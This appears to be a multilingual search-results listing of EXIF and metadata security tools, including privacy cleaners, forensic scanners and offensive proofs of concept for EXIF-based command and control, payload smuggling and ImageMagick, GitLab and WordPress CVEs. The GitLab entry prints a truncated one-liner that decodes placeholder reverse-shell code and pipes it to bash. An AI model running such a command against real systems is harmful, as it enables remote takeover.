2149 matches found
Exif-Remove
命令行工具 - 轻松移除Exif数据 该工具使用Python 2.7编写,并通过pyinstaller编译为Windows操作系统版本。这个工具没有什么特别之处,只是让我的工作更轻松,也许对你也有用。 为什么? Exif是存储在你的照片中的隐藏Metadata。许多好意的人无意中expose personal information,这些信息嵌入在这些数字图片的元数据中。为了更好地保护你的在线confidentiality,移除Exif数据至关重要。 更新日志 v.1.0.3 工具会检查Exif数据是否已被移除(通过文件名中的ex字符串识别) 修复问题 - 单线程工作器 安装说明...
goca
Goca 是一个用 Go 编写的 FOCA 分支,主要用于查找扫描文档中的元数据和隐藏信息。这些文档可能存在于网页上,可以通过 Goca 下载并分析。 它能够分析多种文档,最常见的有 Microsoft Office、Open Office 或 PDF 文件,此外也能分析 Adobe InDesign 或 SVG 文件等。 这些文档通过以下搜索引擎进行搜索: Google Bing DuckDuckGo Yahoo Ask 随后下载文档,从图形文件中提取 EXIF 信息,并在下载文件之前对通过 URL 发现的信息进行全面分析。 使用方法 从 发布页面 下载预编译的包。 要从源码构建,需要...
exifLooter
Exif Looter 博客文章 » · 报告 Bug · 请求功能 目录 1. 开始入门 安装 2. 使用 分析特定图像 分析特定目录 管道与其他工具 从图像中移除元数据 获取开放街道地图 URL 3. 报告 4. 路线图 5. 贡献 6. 许可证 7. 联系 开始入门 关于在本地设置 Exif Looter 的通用信息 安装 root@kitploit: go install github.com/aydinnyunus/exifLooter@latest ExifLooter 依赖于 exiftool,因此请确保它已在您的 PATH 中。 在 Kali Linux 上...
Refloow-Geo-Forensics
📍 Repositorio Oficial de GitHub de Refloow™ Geo Forensics Herramienta profesional de código abierto para OSINT y Forense Digital Versión 1.4.0 Última: Versión 1.0.0 Lanzamiento: Refloow™ Geo Forensics es una herramienta de forense digital de alto rendimiento y código abierto diseñada para...
xzf
Introducción xzf es un PoC simple que demuestra cómo los datos EXIF pueden usarse para comando y control. xzf obtiene una imagen de una URL predeterminada, luego lee la etiqueta de software para obtener una cadena de autenticación. Si la cadena coincide, xzf ejecutará cualquier cosa contenida en ...
ExifSmugglingPoC
Contrabando de Exif Una evolución de prueba de concepto del Contrabando de Caché. Este ataque oculta un payload ejecutable dentro de los datos Exif de un JPG. Como resultado, el almacenamiento en caché de imágenes como el de un navegador web puede usarse para descargar pasivamente el payload. Com...
FOCA
FOCA(通过收集的档案对组织进行指纹识别) FOCA 是一款主要用于查找扫描文档中的元数据和隐藏信息的工具 。这些文档可能位于网页上,可以使用 FOCA 下载并分析。 它能够分析多种文档,最常见的是 Microsoft Office 、Open Office 或 PDF 文件,尽管它也能分析例如 Adobe InDesign 或 SVG 文件。 这些文档通过三个可用的搜索引擎进行搜索:Google 、Bing 和 DuckDuckGo 。三个引擎的结果总和构成了大量文档。也可以添加本地文件来提取图形文件中的 EXIF 信息,并且在下载文件之前,就已经对通过 URL...
auto-cve-2022-44268.sh
auto-cve-2022-44268 Automatizando la explotación de CVE-2022-44268 ImageMagick Arbitrary File Read Hallazgo original: https://www.metabaseq.com/imagemagick-zero-days/ Repositorio del PoC: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC Descripción ImageMagick...
onionscan
What is OnionScan? OnionScan is a free and open source tool for investigating the Dark Web. For all the amazing technological innovations in the anonymity and privacy space, there is always a constant threat that has no effective technological patch - human error. Whether it is operational securi...
GitLab-preauth-RCE_CVE-2021-22205
GitLab-preauth-RCECVE-2021-22205 single line bash PoC for GitLab preauth RCE CVE-2021-22205 root@kitploit: t="http://vuln.site";cmd='echo xxxbase64ofreverseshellcodexxx |base64 -d|bash';f="1.jpg";echo...
LocalExifGeoMap
Local Exif Geo Map 📍 A powerful, privacy-focused, browser-based tool to visualize and analyze GPS data from your photos. Simply drag and drop images to generate interactive maps, heatmaps, elevation profiles, and trip statistics. Why? I've always wanted a self-hosted tool to analyze my photos and...
basecrack
BaseCrack Decodificador para esquemas de codificación Base BaseCrack es una herramienta escrita en Python que puede decodificar todos los esquemas de codificación base alfanuméricos. Esta herramienta puede aceptar entrada de un solo usuario, múltiples entradas desde un archivo, entrada desde...
external_libexif_AOSP10_r33_CVE-2020-0198
libexif ------- DESCRIPTION libexif is a library for parsing, editing, and saving EXIF data. It is intended to replace lots of redundant implementations in command-line utilities and programs with GUIs. FEATURES libexif supports parsing, editing and saving of EXIF data. In addition, it has gettex...
imago-forensics
imago-forensics 🕵️ Imago 是一个 Python 工具,用于递归地从图像中提取数字证据。 该工具在整个数字取证调查中非常有用。如果你需要提取数字证据并且有大量图像,通过此工具你可以轻松地对它们进行比较。Imago 支持将证据提取到 CSV 文件或 SQLite 数据库中。如果 JPEG 的 EXIF 中包含 GPS 坐标,Imago 可以提取经度和纬度,并将其转换为度数,并检索相关位置信息,如城市、国家、邮政编码等。 Imago 还提供了计算错误级别分析(Error Level Analysis)和检测色情内容的功能,但这些功能目前处于 BETA 阶段。 设置 通过...
imago-forensics
imago-forensics 🕵️ Imago is a python tool that extract digital evidences from images recursively. This tool is useful throughout a digital forensic investigation. If you need to extract digital evidences and you have a lot of images, through this tool you will be able to compare them easily. Imago...
external_libexif_AOSP10_r33_CVE-2020-0181
libexif ------- DESCRIPCIÓN libexif es una biblioteca para analizar, editar y guardar datos EXIF. Está diseñada para reemplazar muchas implementaciones redundantes en utilidades de línea de comandos y programas con GUI. CARACTERÍSTICAS libexif admite el análisis, edición y guardado de datos EXIF...
exif-gps-tracer
exif-gps-tracer 一个Python脚本,用于从数据集中的图像文件中解析地理定位数据。它还会生成CSV文件以及HTML格式的Google地图输出。 前提条件 要顺利运行此脚本, (1)您需要拥有Google Maps API (2)您需要在控制台中启用Map JavaScript API 要获取API密钥,请参阅此文档... https://developers.google.com/maps/documentation/javascript/get-api-key 安装 root@kitploit: git clone...
WP_CROP_RCE
Informe de análisis de WordPress Image CROP RCE POC & Dockekfile : https://github.com/synod2/WPCROPRCE Este documento trata sobre las vulnerabilidades CVE-2019-8942 y CVE-2019-8943, conocidas como WordPress Image CROP RCE, encontradas en versiones de WordPress anteriores a 4.9.9 y 5.0.1...
external_libexif_AOSP10_CVE-2020-0452
libexif ------- DESCRIPTION libexif is a library for parsing, editing, and saving EXIF data. It is intended to replace lots of redundant implementations in command-line utilities and programs with GUIs. FEATURES libexif supports parsing, editing and saving of EXIF data. In addition, it has gettex...
Exif-Grabber
About Exif Grabber Beta Version Exif Grabber is a python tool designed to extract exif data from picture with two methods Screenshot Screenshot showing a part of it working Requirement Exifread library :https://pypi.python.org/pypi/ExifRead Installation root@kitploit: $ git clone...